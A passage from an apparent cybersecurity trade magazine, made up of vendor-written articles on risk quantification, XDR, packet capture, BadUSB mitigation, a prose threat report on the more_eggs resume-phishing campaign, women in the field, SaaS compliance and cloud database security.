aspect of programs, focusing largely on economic measures and efficiency rather than defending against

cyberattacks and network intrusion, with the closest item being supply chain resilience. A stronger

emphasis on improving the transportation system’s cyber responses is a necessity given how at risk the

sector is to problems.

About the Author

Alan Cunningham is a Journalist with multiple national security and

human rights organizations including Truth Be Told, ReaperFeed, and

the foreign policy think tank Quo Vademus. He has been published in

various other publications including The Diplomat, Modern Diplomacy,

Security Magazine, the National Institute of Military Justice, The Crime

Report of the John Jay College of Criminal Justice, and the Jurist of the

University of Pittsburgh School of Law. He is a graduate of Norwich

University and the University of Texas at Austin and hopes to gain a PhD

in History from the University of Birmingham and a JD from St. Mary’s

School of Law. He is a sexual assault advocate and volunteers his time

to Combat Sexual Assault. He can be reached on Twitter at

@CadetCunningham.

152

In 2021 the number of ransomware attacks doubled, the number of supply chain attacks tripled and

threats from state-backed hackers continue to rise. While sectors like finance and healthcare suffered

more than others, attacks are up across the board and everyone is vulnerable.

It is now basically inevitable that most organizations will experience some type of cyberattack. That

means that there must be a shift in attitude from pure prevention–which is no longer realistic—to fully

understanding a company’s exposure to cyber risk and understanding the tools needed for smarter

planning and comprehensive decision-making capabilities.

Putting risk exposure, or the cost and likelihood of a potential breach into dollar terms is more important

than ever for organizations. This is the only way that companies will be able to protect themselves in the

long run and strengthen themselves as they shift the cybersecurity of their organization from a cost-

center to a business differentiator and even market advantage. So how exactly can organizations do

this?

Businesses Will Suffer Cyber-Attacks; But

Do They Know the Real Cost?

By Reuven Aronashvili, Founder & Chief Executive Officer at CYE

153

Think Holistically

While the CISO is in charge of security, this is no longer the realm of the CISO alone. Security is a

valuable business asset–and risk– and the entire C-suite needs to be involved, including having CISOs

sit on management boards. Cybersecurity is increasingly affecting productivity and daily operations in

every sector, with attacks or breaches potentially stopping or interrupting operations for hours or days.

When cyberattacks interrupt business, as seen in cases like the shutdown of the Colonial pipeline last

year, they demand action far beyond technical mitigation. Such situations call for public relations, change

in business operations, legal actions and more. Responding to attacks involves all departments, so

should planning for attacks and defining security strategy. Rather than being seen as in charge of

security, today’s CISOs should be seen as an essential bridge between the business and technical

concerns, leading a collaborative effort to protect the organization.

Embrace automatic tools to quantify risk and exposure

In order to have a truly holistic approach to cybersecurity, everyone, including non-technically-minded

executives, need to understand the risk and possible solutions. This means that the risk and the

company’s exposure to potential threats need to be translated into and explained in dollar terms. A proper

risk exposure calculation will take into account each asset, the likelihood of it being attacked and the

consequences of such an attack. This way companies can effectively invest in the proper solutions, and

decide what is worth protecting, and at what cost.

Automation, data and AI play a growing and important role calculating exposure. The internet is full of

cyber risk calculators, and many security companies provide them as well. But most are missing key

components and fail to give a breakdown of direct costs, like the price of an in-house IR team, and indirect

costs, like fines or crisis communications following breaches. Most also fail to take into account factors

like the cost of closing a business or part of a business due to an attack.

That’s why we at CYE provide a SaaS solution that maps out attack routes, and correlates technical

vulnerabilities with business insights that optimize the reduction of cyber exposure through scientific

analysis of the organizational risk profile. This allows the system to assign a dollar amount to each

possible breach, and points to exactly where mitigations are needed. These assessments are unique for

each company, and based on an algorithm using the most relevant and up-to-date data. It is not a

simulation, but rather delivers a real-life picture of the risk scenario and the bottom line effect it could

have on the business through the use of advanced algorithms and graph modeling, but also highly

experienced “red teams” with national-level experience. This goes along with our company’s general

approach to help users understand their security posture within the bigger business picture.

Look for targeted security solutions, and don’t forget about the human factor

CISOs often get distracted by all the cybersecurity solutions, especially as new one chasing the latest

vulnerabilities are constantly released. This has led to a situation of over differentiation in the sector, with

many solutions solving very specific issues. Companies should not only look for more holistic solutions

154

and platforms that address several issues together, but should make sure the solutions reduce their

actual risk exposure, rather than just aim to solve the latest or trendiest type of general threat.

When implementing solutions, the human team is equally important. Organizations should make sure

that the security team knows how to properly execute the tools to get the biggest benefits out of them.

Companies should also understand the actors behind the most likely threats, and respond accordingly

with specific and qualified cyber talent. This is especially important when it comes to preventing attacks

by state-backed actors.

Cybersecurity challenges–and solutions–will only proliferate as the world grows more digital. But the key

is matching the solutions to the threats; and deciding which threats require the most immediate solutions

and mitigation while also accounting for the human factor.

About the Author

Reuven Aronashvili, Founder & Chief Executive Officer at CYE.

Reuven is a serial cybersecurity entrepreneur and a national

cybersecurity expert. Reuven is an ex-Matzov and a founding

member of the Israeli army’s Red Team (Section 21) and Incident

Response Team. His expertise is in designing and developing

innovative security solutions for governments and multinational

organizations around the globe, as well as conducting high-profile

security improvement programs. Reuven serves as a trusted

advisor for executives in leading Fortune 500 companies and is

certified by the US Department of Homeland Security as a world

class ICS and SCADA cybersecurity expert. Reuven completed

his Master’s degree in Computer Science from Tel-Aviv

University, as part of an excellence program during his military

service.

www.cyesec.com

155

156

aiXDR Brief

By Randy Blasik, V.P. of Technology Solutions, Seceon Inc.

Introduction.

aiXDR with its, novel approach focusing on detecting and stopping threats in all vectors automatically

before data is compromised, has redefined the role of today’s Cyber Security Analysts. The solution with

Managed Service Security Provider (MSSP) “multi-tier multi-tenant” capabilities has finally made it

operationally profitable for MSSPs to offer, customers of any size and ability, advanced threat detection

and remediation services. Solving today’s most vexing problem: How to make threat analysis and

remediation a task that takes minutes to perform when an incident arises with minimally trained staff.

Seceon’s aiXDR provides visibility, detection, prioritization, and response capability for unparalleled

security and operational efficiency and accuracy. It helps organizations overcome: (1) The pitfalls of

siloed EDR solutions, (2) difficult integration with other tools (SIEM, IDS, DLP, etc.), (3) lack of deep

security analytics to automate core processes, (4) failure to integrate data from key sources (such as,

DNS logs, NetFlows, Vulnerability Assessment Scanners, Active Directory, etc.), and (5) partial threat

coverage with limited visibility into the detection and response. Seceon is an All-In-One experience that

is organically and seamlessly fused together.

Not all XDR solutions are equal.

The XDR market is full of vendors offering their XDR solutions. However not all XDR solutions offer the

same protection. These solutions do not provide the full visibility required in today’s more complex

networks. They may lack for instance, netflow information or adaptive self-Learning models to auto tune

noise and sometimes restrict the number of feeds that they can ingest.

157

Seceon provides full 360° coverage of the Threat Landscape by including:

“Anything that gives less coverage is exposing the client to a potential breach and exposing your business

to additional liabilities. Please ensure that any solution you evaluate has the same coverage as the

Seceon solution.”

-Randy Blasik V.P. Technology Solutions, Seceon

Automation & Visibility are the Key.

End point Detection & Response (EDR) is migrating to becoming Extended Detection & Response (XDR).

This is because the gap between what is known and what is unknown, in the form of a threat is growing.

The number of devices and activity that are generating vast volumes of data has become unmanageable

and the data ingestion volume has become impossible for traditional security tools. The result is that

there is a need to automate as much as possible. This automation needs to be extremely accurate,

intelligence driven, leading to reduced false positives and true actionable responses. Data needs to be

gathered from all the devices in the network landscape.

Having collated all this data it needs to be presented in a way that shows not only what is happening live,

but also what happened in the past. You need to be able to benchmark the activity of a device and user

to check if an event is “out of character” for that device or user, or if this has been seen before and is not,

for example, a regular test that should be marked as not being a threat.

Having everything on one platform, with multi-tier/multi-tenancy capability, automating events from all

devices and presenting these results in a way that enables the Analyst to make informed decisions is

what we at Seceon have been providing to our clients since we decided to build the platform. Having one

integrated platform considerably reduces costs compared to solutions that are made from combined bolt

on components. Seceon and its Advanced Threat Detection and Remediation Platform (aiXDR) is the

industry’s most comprehensive platform for extended detection and response (xDR).

158

About the Author

Randy Blasik is the V.P. of Technology Solutions of the Seceon Inc..

A veteran of more than 20 years in the fields of Technology

development, Technology Support and Cyber Security. Prior to

Seceon, Randy has spent the last 7 years working as the Chief

Technology Officer where he played a key role in building the

business into a nationally recognized Managed Services Provider.

Randy has also held key technology focused roles in small, mid and

large market firms dating back to the year 2000. At Seceon Randy

provides seasoned leadership, oversees Technology Solutions and is

using his wide range of experience to drive both internal and external

successes.

Randy can be reached online at Email,

https://www.linkedin.com/in/randy-blasik-7a0183149/ and at our

company website https://www.seceon.com/leadership/

159

Why Aren’t More Companies Capitalizing on

Packet Capture?

By Cary Wright, VP of Product Management, Endace

In a threat landscape that is now changing more rapidly than ever before, why aren’t more companies

capitalizing on the benefits of packet capture? Well, historically, packet analysis has been a manual

function with very real accessibility issues. It’s not unheard of for security teams to struggle to pull several

weeks' worth of packets, running searches for hours or days across massive files to find the evidence

they are looking for. Unsurprisingly, this type of packet handling has also been costly.

Packet capture has also mainly been used by senior security analysts with deep experience in packet

forensics -- a specific skill that's in short-supply, and not something more junior analysts know how to do,

despite its necessity in today’s threat landscape.

How do you do packet capture well, so that everyone (not just experienced, senior packet analysts) can

quickly find the data they need, get to relevant packets from alerts in their relevant tools, and extract

value from that full packet data?

As renowned SANS Institute course instructor Jake Williams likes to say, “today’s packet capture is not

your Grandma’s packet capture.” Indeed, packet capture has truly moved to the next level, and security-

savvy companies are deploying distributed, centrally managed recording appliances that are designed to

be modular and highly scalable to deliver the storage capacity, performance and rapid search that is

needed while accelerating investigation and response time.

160

Access the actual content of a network conversation - easily

The forensic evidence gained from packet capture is a vital resource for incident response teams, helping

to accurately reconstruct cyberattacks so analysts can understand exactly what happened and what the

full impact is. Forensic evidence can provide a detailed breakdown of how far an attacker penetrated,

how they managed to get around existing defenses, and what data and systems were attacked and

potentially compromised. Without this knowledge, SecOps teams can have a hard time understanding

how to respond to and resolve incidents.

Some security teams rely on piecing together evidence from log files -- system logs, application logs,

authentication logs etc. -- combined with network metadata, threat intelligence and alerts from their

security monitoring tools. The problem with this is that it doesn’t provide the actual payload information

that enables teams to accurately reconstruct what took place to see exactly what files were transferred,

what data was extracted, and what systems were impacted. Log files and metadata provide a snapshot

summary of events which is useful for building a picture of activity. But relying solely on these sources

and not having access to packet data means teams can risk missing critical evidence when it really

matters.

The alternative is to record full packet data, which lets analysts inspect historical traffic to investigate

threats more closely. This provides access to the actual content such as files, malware, ransomware,

executables, zip archives, exfiltrated documents, code downloads and more – anything attackers can

use to compromise user and network security and steal data.

Analysts can also re-analyze recorded packet data to generate detailed logs on-demand - including DNS,

HTTPS, TLS, SMTP, database transactions, and more - or analyze recorded traffic using new rules to

detect network threats that might have been missed the first time and provide deeper contextual insight

into attack activity.

Accelerating investigation and response

The experience that many teams had in the past with packet capture is that it can be challenging to

accurately record and manage large volumes of data at high-speed -- and time-consuming to locate the

specific data that is needed for an investigation. Packet analysis has traditionally required deep expertise

too.

Modern packet capture solutions are designed to be modular and scalable. They can cost-effectively

record weeks to months of history at today's fastest network speeds (10 Gbps up to 100 Gbps or more),

giving security teams plenty of time to go back and investigate historical events.

Analysts can search/data-mine recorded data to find and analyze relevant packets quickly from within

what may be petabytes of data. Integration with a wide variety of cybersecurity solutions makes it possible

to "pivot" in-context from an alert in a security or performance monitoring tool directly to the relevant

packets. This speeds up and streamlines the investigation process and can also enable common

evidence collection and analysis tasks to be automated (e.g. using SOAR tools.)

161

This also makes it easy to extract useful information from packet data -- such as reassembled files or

detailed analysis logs -- without having to be an experienced senior analyst with deep packet analysis

expertise. And enabling this to be done on historical data – so you can go back-in-time to analyze past

events.

Analysts can review days, weeks or months of recorded packet history easily and quickly for incident

response, threat-hunting or troubleshooting network or application performance issues. Networks can

also be set up as a fabric of multiple capture points, capable of being searched from a single pane of

glass.

With these improvements and more, the next generation of packet capture is set to become the gold

standard for understanding the threats traversing networks, and troubleshooting IT operational or

performance issues.

About the Author

Cary Wright, VP Product Management at Endace, has more than 25

years’ experience in creating market-defining networking, cybersecurity

and application delivery products at companies including Agilent, HP, Ixia

and NEC. www.endace.com

162

What Makes A USB Bad - And How Should

Organizations Resolve This Risk?

When ransomware can attack organizations via USB drives and cables, best practice backup

and security becomes even more critical

By Jon Fielding, Managing Director, EMEA Apricorn

Earlier this year, the FBI uncovered that a cybercrime group had been mailing out USB sticks in the hope

that recipients would plug them into their PCs which would then install ransomware on their networks.

UK businesses should be taking note of the trend for cyber criminals to adopt such strategies - which,

more often than not, can prove effective and even damaging for organizations.

In particular, ransomware attacks have resulted in record financial payouts to criminals in 2021, just to

ensure business continuity. The 2022 Unit 42 Ransomware Threat Report found that the average

ransomware payment rose 78% last year to $541,010 (£414,193). Ransom demands soared by 144% to

reach an eye-watering average of $2.2m (£1.7m)

Criminals will try any and every avenue to get inside access to an organisation – either physically or

virtually. Ransomware-by-thumb-drive is just a new avenue that builds on the old badUSB exploit, dating

back to 2006 - when an auto-run vulnerability was discovered that automatically executed malicious

payloads when an 'infected' device was loaded.

163

If a USB stick with corrupted firmware can be sent to the right people in a spear phishing attempt,

alongside messaging or other communication of a convincing story that means the drive in question gets

used, criminals can easily gain a point of unfettered access to a network. The same attack, leveraging

badUSB, can now be delivered through a simple USB cable which, to the naked eye, looks like any other

cable.

How to spot and mitigate a bad USB in 2022

Unfortunately, because badUSB threats are Trojan horsed in simple human interface devices, they can

be almost impossible to detect if not picked up by constant monitoring of the specific endpoint. Unknown

USB devices cannot be trusted - yet Apricorn's survey reveals that often, trust is misplaced. This means

that organisations increasingly need to ensure mitigation is already in place at all times.

Typically, this must be achieved without resorting to a blanket ban on USB-enabled devices, which are

ubiquitous and frequently vital today when it comes to moving and storing data, especially in a hybrid

working environment where some work from home, and others in the office.

The good news is, mitigations can be easily and affordably achieved by mandating the use of corporate-

standard USB devices with high-level encryption and firmware implemented in a way that makes it

impossible to modify for this exploit - right across the entire organisation.

The policy can then be enforced by locking down USB ports on employee machines to ensure they can

only accept an approved USB device.

Of course, such a policy will also cover off the need for a solid 321 backup strategy that requires a secure

offline, off-site back-up of all critical data along with a further copy on another medium or in the cloud, for

disaster recovery should the worst happen regardless.

Over half of the US and UK organisations we polled in late 2021 revealed that they had lost data due to

inadequate backup procedures.

Even government departments can fall prey to such oversight - luckily, our own investigation revealed

that many also encrypted their data - another key to threat mitigation overall. All data should be encrypted,

whether in transit or in storage, to ensure that even if information falls into the wrong hands, it cannot be

accessed.

Modern software-free, 256-bit AES XTS hardware-encrypted USB drives can therefore play a critical role

in covering off many critical security and privacy requirements, while maintaining fast, convenient access

for approved users at all times, wherever they are working.

Backed up with workforce-wide education - including at management level - around the threat, specifying

the risks associated with using unsanctioned USBs as well as the role employees must play in countering

such threats, operate as a strong, effective defence in most circumstances, as part of a multi-layered

security strategy.

164

About the Author

Jon Fielding, Managing Director, EMEA Apricorn. Jon is responsible for

Apricorn’s EMEA sales and operations strategy, driving revenue growth

and establishing its channel network. CISSP-certified, he’s been

focused on information security for 23 years, working with organisations

ranging from IBM to start-ups including Valicert, Tumbleweed and

Ironkey. In his last three roles, Jon has been first in region and tasked

with establishing the company into EMEA. He has specialised in data

encryption and storage for the last 10 years Jon can be reached online

at Jon Fielding | LinkedIn and at our company website

www.apricorn.com

165

eSentire Discovers Hackers Spearphishing

Hiring Managers with Resumes Poisoned

with More_Eggs Malware

By Keegan Keplinger, Research and Reporting Lead, Threat Response Unit, eSentire

In March eSentire’s security research team, the Threat Response Unit (TRU), discovered that the stealthy

more_eggs malware had re-emerged after being silent for nearly a year. More__eggs was being used in

a phishing campaign where hackers were posing as job applicants and luring corporate hiring managers

into downloading what they believed were resumes from potential candidates. However, the bogus

documents contained the more_eggs malware.

More_eggs is malicious software that contains several components, including one that is engineered to

steal valuable credentials, including usernames and passwords for corporate bank accounts, email

accounts and IT administrator accounts. If a threat actor can obtain IT administration credentials for a

company, they can easily exfiltrate data from the victim, spread their malware to other computer hosts

within the organization’s network, via Microsoft TeamViewer, and encrypt a company’s files.

The Golden Chickens group (aka Venom Spider) is believed to be the threat operators behind

more_eggs. Thus far this year, TRU has discovered and shut down four separate security incidents

relating to more_eggs. The organizations attacked include a U.S.-based aerospace/defense company; a

large UK-based CPA firm; an international business law firm based out of Canada; and a national

Canadian staffing agency.

166

The 2022 More_Eggs Operation – a Déjà Vu of the 2021 LinkedIn More_Eggs Campaign?

Ironically, an eerily similar more_eggs campaign was uncovered by eSentire’s TRU in March 2021.

However, during that campaign, rather than posing as hopeful job candidates sending poisoned resumes,

the threat actors targeted professionals on LinkedIn seeking employment. They sent the job seekers .zip

files disguised as job offers. When the targets opened the zip file, it led to the installation of more_eggs.

The hackers tried enticing the targets into clicking on the zip file by naming it after the job seeker’s current

job title and adding “position” at the end.

For example, if the LinkedIn member’s job was listed as ‘Senior Account Executive—International

Freight,’ the malicious zip file would be titled ‘Senior Account Executive — International Freight position.’

TRU Disrupts More_Eggs Attacks Hitting an Aerospace/Defense Company, International Law

Firm, International CPA Firm and National Staffing Agency

When TRU discovered and shut down the four more_eggs incidents this year, each incident involved a

new variant of more_eggs.

TRU believes that the threat actors behind the 2022 more_ eggs campaign are not randomly targeting

companies. For example, the CPA firm and the staffing agency, both list a job posting on Indeed.com

and LinkedIn which match the title of the resume each hiring manager received. The aerospace/defense

company also had a job listed on ZipRecruiter.com which matches the title of the fake resume received.

The Innerworkings of More_Eggs

More_eggs is a sophisticated suite of malware components. One of those components is VenomLink (a

component used to trick the victim into installing TerraLoader). TerraLoader is an intermediate

component used to install numerous modules designed to take malicious actions such as credential theft,

lateral movement, and file encryption throughout a victim’s IT network. Here is a full breakdown:

• VenomLNK is a poisoned LNK file. Windows uses LNK files to automate program execution.

More_eggs uses a maliciously written LNK file to execute TerraLoader by tricking the user into

opening what they think is a document.

• TerraLoader loads the other modules from VenomLNK

• TerraPreter provides a Meterpreter (a Metasploit attack payload) shell in memory

• TerraStealer is an info stealing module used to exfiltrate sensitive data

• TerraTV allows threat actors to hijack TeamViewer for lateral movement

• TerraCrypt is a ransomware plugin for PureLocker ransomware, aka CR1 Ransomware, a

lesser-known ransomware.

The social engineering method for the 2022 more_eggs campaign consisted of disguising a zipped copy

of the VenomLNK malware as a job applicant’s resume. A benign PDF resume was included as well,

which served as a decoy resume, while more_eggs installed TerraLoader.

167

As with previous more_eggs variants observed by TRU, the malware abuses legitimate Windows

processes to evade detection, alongside a decoy document to trick users. With the incident involving the

accounting firm, an employee of the firm received what they thought was a candidate’s resume. However,

the resume was the VenomLNK malware. Once VenomLNK was executed, it proceeded to execute

TerraLoader so that TerraLoader could load various information-stealing modules and intrusion modules

belonging to the more_eggs suite. With the 2022 campaign however, there were two notable differences:

• In place of the previously abused Windows process, cmstp.exe – which manages network

connections – more_eggs was abusing ie4uinit.exe, another Windows Process, to load its

malicious plugins.

• Rather than targeting hopeful candidates looking for work, the hackers targeted businesses

looking for employees.

Protecting Against More_Eggs

“Thus far we are seeing threat campaigns, involving more_eggs, just a few times a year, unlike some

other cyberthreats,” said Rob McLeod, Vice President of eSentire’s Threat Response Unit. “This, in

addition to the campaigns’ spearphishing component, indicates to me that the threat actors using

more_eggs, are extremely selective and patient. It is important that companies and public entities,

especially those in critical infrastructure sectors, consider adopting the following security

recommendations.”

Cybersecurity Protection Tips

• Security Awareness Training for All Employees. Security Awareness training should be

mandated for all company employees. The training should ensure that employees:

➢ Avoid downloading and executing files from unverified sources. For example, be wary of

Word and Excel documents sent from an unknown source or acquired from the Internet that

prompts you to ‘Enable Macros’.

➢ Avoid free versions of paid software.

➢ Always inspect the full URL before downloading files to ensure it matches the source (e.g.,

Microsoft Team should come from a Microsoft domain).

➢ Inspect file extensions. Do not trust the filetype logo alone. An executable file can be

disguised as a PDF or office document.

➢ Ensure standard procedures are in place for employees to submit potentially malicious

content for review

• Anti-virus isn’t enough. Malware that abuses Living Off the Land Binaries (LOLBins) bypass

binary detection approaches. Therefore, Endpoint Detection and Response (EDR) agents need

to be installed on all hosts. An EDR solution is a necessary technology for detecting threats

such as more_eggs, and EDR agents must be continuously monitored and updated with the

evolving threat landscape. If not, critical alerts will not be triaged and investigated. Managed

Detection and Response (MDR) providers offer this service. Robust and comprehensive MDR

services require an AI-powered Extended Detection and Response (XDR) technology platform

so that the hundreds of daily security signals, generated by an organization’s EDR agents, can

be promptly ingested, analyzed and responded to. Security events which can be resolved

168

through an automated response are processed, while security events requiring a hands-on

response are handled by the MDR’s cybersecurity analysts and threat hunters.

• Monitor the Threat Landscape. Organizations must have access to relevant threat

intelligence, and it must be actioned in a timely fashion. Internal security teams need to be

specifically informed about their operating environment, working in concert with their external

security provider.

Learn more about eSentire’s industry renowned Threat Response Unit.

Read eSentire’s latest Security Advisories and Reports.

About the Author

Keegan Keplinger is the Research and Reporting

Lead for the Threat Response Unit at eSentire. He

conducts threat research and disseminates reports on

threat activity with the goal of understanding threat

actor behavior and economics. Keegan has an

undergraduate degree in physics and graduate

degrees in neuroscience and applied mathematics; he

originally joined eSentire as the Data Visualization

Lead on the Threat Intelligence team in 2017, but

quickly evolved into a broader role in detection

engineering, conducting threat hunts, and reporting on previously unobserved threat activity.

Keegan can be reached online at Keegan.Keplinger@esentire.com and at our company website

https://www.esentire.com/.

169

As a woman who has recently entered the cybersecurity field, I can safely say that I viewed it as an

intimidating, male dominated career path. That perception needs to change if we are to see more women

build careers in cybersecurity. For an industry that is built on innovation and being fast paced, this should

be very achievable.

Every single day, businesses face new risks and threats that need to be protected against. And one of

the best ways that we as an industry can do that is by realizing that different skillsets and mindsets are

advantageous. Do I feel the industry is averse to this, or against having more women in the field?

Absolutely not. Work has already been undertaken into creating equal opportunities for both men and

women in cyber, yet it remains that only 24% of the workforce are female.

Barriers To Entry Must Be Brought Down If

More Women Are to Enter Cybersecurity

By Sydney Asensio, Head of Operations at 2020 Partners

170

Now more than ever, companies are creating enticing brand statements, promoting attractive benefit

packages, and offering training and certification programs to appeal to the skilled prospects.

Cybersecurity organizations now need to prioritize eradicating the remaining false perceptions through

encouraging messages towards women, to successfully break biases and make them feel empowered

about pursuing a job in cybersecurity.

Are the perceptions fair, and justified?

We have already witnessed the growth of initiatives to help support and act as a platform for women

looking to enter the industry, including WiCys (Women in CyberSecurity) and WoSEC (Women of

Cybersecurity.) They’re aiming to unite aspiring women in cyber through collaboration, networking, and

mentoring, but how often is this same initiative being prioritized within a company?

Unconscious biases exist within every sector, as well as pretty much everywhere else in this world. The

attitude of “jobs are meant for X because of Y” is no one’s fault, but we need to work hard in ridding that

misperception. Research from tech giant Samsung last year showed that 44% of workers said they

believe certain jobs are exclusively male or female. And 17% of women have also not applied for a job

for fear of being discriminated against because of their gender.

Before entering the cybersecurity sector, my professional background was in client relations, sales,

without a drop of cyber experience. I was worried about the male-dominated industry and found myself

feeling intimidated, questioning my ability to stand out and succeed in cybersecurity. That was until I

realized the value of the transferable skills that I had developed through my previous experience as well

as my endeavor to develop industry-specific knowledge. Coupled with a strong support network around

me, these fears are long gone, and I can now see the endless opportunities for women in cybersecurity,

regardless of their background in the sector.

Leadership and management roles, advisory, and customer relations positions are paramount to

business and industry success, and create countless opportunities for new talent to take the reins and

become a huge driving force for the sector. The business of cyber is extensive, and there are countless

opportunities for newcomers, especially women, with different backgrounds who will add greater value to

a company.

How can businesses expedite the situation?

With it being such a dynamic landscape, encouraging more women to operate in the cybersecurity

industry can help introduce new perspectives and ways of thinking to help combat the ever-changing

threat landscape. It is vital that we endeavor to make women feel empowered to be part of a growing

industry – a tactic that all organizations should be encouraged to adopt. Only then will applicants of all

backgrounds gain the confidence to take steps towards cyber.

There are currently over three million unfilled positions in the cyber industry, and that number is still

growing. It’s important for companies to be inclusive and make themselves more attractive to women with

171

different backgrounds and skillsets. This includes shaping their messaging, having a strong female

leadership presence, promoting mentorship programs to help sculpt future female leaders, and offering

certification and training programs for upskilling opportunities. It’s about championing those already

contributing to the greatness of the industry and replacing old misperceptions with truthful representations

of the sector.

Creating a positive step change

It is going to be difficult to fight against the human nature behind perceptions, but it is very possible. Aside

from ensuring business messaging is tailored to all groups of people, from any walk of life, there are

several other approaches that organizations can take to help close the gap.

Firstly, it’s crucial to remember that all perceptions and stigmas start having an impact on individuals

before their careers begin. Efforts should be made early on in educational settings to encourage the next

generation of women to not fear or shy away from paths previously deemed to be male-dominated, and

companies can work specifically with educators and parents to tackle the issue from all angles.

Establishing a strong support network early on is fundamental. Having connections to those already in

the industry, ready to give you a helping hand whenever you need it, is extremely valuable.

The gender gap isn’t a tick-box exercise for businesses to fix, it is an underappreciated area that needs

genuine effort from all sides. Promoting strong, exciting female role models who are in leadership

positions through to entry level roles, organizations will be changing perceptions on a daily basis. The

more we see these people doing their jobs, we have a great opportunity to trigger real and lasting change.

The next generation of talent must be welcomed into the industry with open arms, if they are to one day

take over the mantle of responsibility.

About the Author

Having graduated from Florida International University in 2014, Sydney

has acted in a number of managerial and sales roles before becoming

Head of Operations at 2020 Partners in February 2021 as her first step

into the cybersecurity industry. During her time so far in the industry,

Sydney has recognized the need for perceptions to be changed for

women to be more actively encouraged to join.

Sydney can be reached online at

https://www.linkedin.com/in/sydneyasensio/ and at our company

website https://2020partners.co

172

To Secure Saas, Combine Top Compliance

Frameworks with An SSPM

The explosion in the number and variety of SaaS apps used by enterprises has created both opportunities

and challenges. While the cybersecurity department’s mission is to ensure that their security hygiene

remains intact, they need an accurate and comprehensive understanding of the potential attack surface

of their SaaS stack.

By Maor Bin, CEO & Co-Founder, Adaptive Shield

As organizations continue to grow their SaaS environments, new challenges emerge which have them

asking some critical new questions: How can I comply with the major industry standards and manage a

SaaS security audit? How do I keep customer, partner, and employee data protected throughout the

SaaS stack? There are standards and compliance mandates available, like National Institute of

Standards and Technology (NIST) and Service Organization Controls (SOC), which have been created

to help organizations ensure the highest security hygiene. And when it comes to SaaS app security, these

frameworks and processes can be achieved with support from a SaaS Security Posture Management

(SSPM) tool.

173

NIST (National Institute of Standards and Technology)

NIST’s Cybersecurity Framework (CSF) combines a host of approaches to dealing with cyber security

threats, including setting up procedures, training, defining roles, auditing, and monitoring. While it’s true

that much of NIST’s recommendations have been geared towards the classic legacy critical infrastructure

security challenge, the CSF and its updates SP 800-53 can help organizations better respond to the risks

that occur in SaaS-based work environments.

An SSPM solution helps incorporate these recommendations into an organization’s SaaS environment

in an easy-to-use fashion, by taking complex controls – such as “Network Access To Non Privileged

Accounts” (SP 800-53 IA-2 (2)) – and turning it into tangible configurations that can be monitored and

remediated across all SaaS platforms. The same is true for multi-configuration requirements such as

NIST CSF PR.AC-7, which demands not only identifying the authentication method, but also matching it

to asset risk. Only an advanced SSPM solution can provide the required depth of visibility into

authentication methods by user and device from a risk perspective.

SOC 2

Whether you are a public or private company, businesses are placing increasing value on SOC 2

compliance. Unlike SOC 1, which centers on internal controls for financial reporting, the purpose of the

SOC 2 report is to evaluate an organization’s information systems, specifically regarding security,

availability, processing integrity, confidentiality, and privacy, over a period of time.

When a company conducts SOC 2 audit, it must run security checks across its SaaS stack. These checks

will look for misconfigured settings, lack of privacy controls, lack of modern security methods, and lack of

access controls.

Managing SaaS Security Posture

The NIST CSF and SP 800-53 standards and compliance mandates like SOC 2, each in turn help a

company demonstrate its commitment to security and protecting data. But adhering to NIST and SOC2

is far more challenging in the growing world of SaaS.

It requires businesses to demonstrate the ability to continuously monitor security across their entire SaaS

environment, many of which are growing at a breakneck speed. There is a misconception that achieving

and maintaining compliance in this new realm is the SaaS provider’s responsibility — the reality is that

while SaaS providers put the necessary security measures in place, the responsibility for using them falls

to the customer and its security team.

This introduces a variety of new challenges. First and foremost, security teams that are stretched thin are

now burdened with the massive undertaking of knowing every application, user, and configuration and

ensuring all are compliant with industry and company policies. Just imagine being asked to manage

50,000 users over just five SaaS apps. That would require the security team to manage 250,000

identities. Further, SaaS environments aren’t static, they are dynamic and continually evolving as

174

employees are added or removed, new applications are onboarded, and permissions and configurations

are updated.

Taking these factors into account, it’s unrealistic to expect security teams to continuously ensure all

configurations are enforced company-wide and ensure they meet compliance standards without an

automated tool.

This is why SSPM is so vital. With an SSPM solution, organizations can map out all the user permissions,

encryption, certificates, and security configurations available for each SaaS application. This provides

visibility into user privileges and sensitive permission and allows teams to correct any misconfiguration

in these areas, taking into consideration each SaaS application’s unique features and useability. As a

result, whether a company has twenty-five SaaS or 500 apps, they can more easily comply with their

company standards and industry-standard such as NIST and compliance mandates such as SOC 2.

If you are planning to introduce SSPM or are already using one, I recommend making sure the solution

can compare your SaaS security misconfiguration checks with the major industry standards — and that

you have the ability to build your own custom company policy.

About the Author

Maor Bin is the CEO and Co-Founder of Adaptive Shield. A former

Cybersecurity Intelligence Officer in the Israel Defense Forces

(IDF), Bin has over 16 years in cybersecurity leadership. In his

career, he led SaaS Threat Detection Research at Proofpoint and

won the operational excellence award during his IDF service. Maor

can be reached online at https://www.linkedin.com/in/maorbin/ and

at our company website https://www.adaptive-shield.com/.

175

176

Great Power Brings Great Responsibility:

How to Keep Cloud Databases Secure in an

Uncertain World

By Bryan Alsdorf, Director of IT and Head of Information Security, MariaDB Corporation

To paraphrase a mantra popularized by Spider-Man: With great power comes great responsibility. It may

sound corny. But, with the rise of massive data informing so many aspects of our lives directly and

indirectly, this well-known wisdom is especially true when it comes to building databases capable of

managing that exponential data growth.

Consider that global data creation is projected to reach more than 180 zettabytes through 2025,

according to Statista research. PC Magazine notes that one zettabyte is “enough storage for 30 billion

4K movies, 60 billion video games, or 7.5 trillion MP3 songs.” Amid this juggernaut surge, it’s cloud

databases, in particular, that are the scalable powerhouses helping businesses organize, understand

and use their own ever-expanding data to create value. The great responsibility comes in keeping all the

data protected.

177

SaaS Vulnerabilities Mean More Data Breaches

The dramatically improved scalability and redundancy of cloud databases are a developmental

benchmark in the history of technology, and those traits are transforming how businesses can interact

with data. But a misconfiguration—all too easy to trigger—can expose data to the internet, bots and bad

actors. Data breaches stemming from different kinds of infrastructure and application vulnerabilities are

common. What’s reported in the news is the tip of the iceberg in the cyber attack landscape. Insider

threats and attacks exploiting poor east-west security (i.e., inside a network) are relentless.

Earlier this year, Block (formerly known as Square) acknowledged that Cash App was breached by a

former employee, leaking personally identifiable information and possibly impacting as many as eight

million customers. Mailchimp’s breach of hundreds of accounts resulted from unauthorized access of a

customer support and account administration tool. Lapsus$ Group’s breach of Okta in March—a

company whose value lies in its B2B SAML authentication product—also happened via a third-party

customer support tool. Lapsus$ hit Azure DevOps software too in March, but Microsoft was able to

contain the breach before data was exfiltrated. Nevertheless, developer and cloud security experts are

on high alert, especially with the pervasiveness of Log4j vulnerabilities, the reach of which may be

unprecedented.

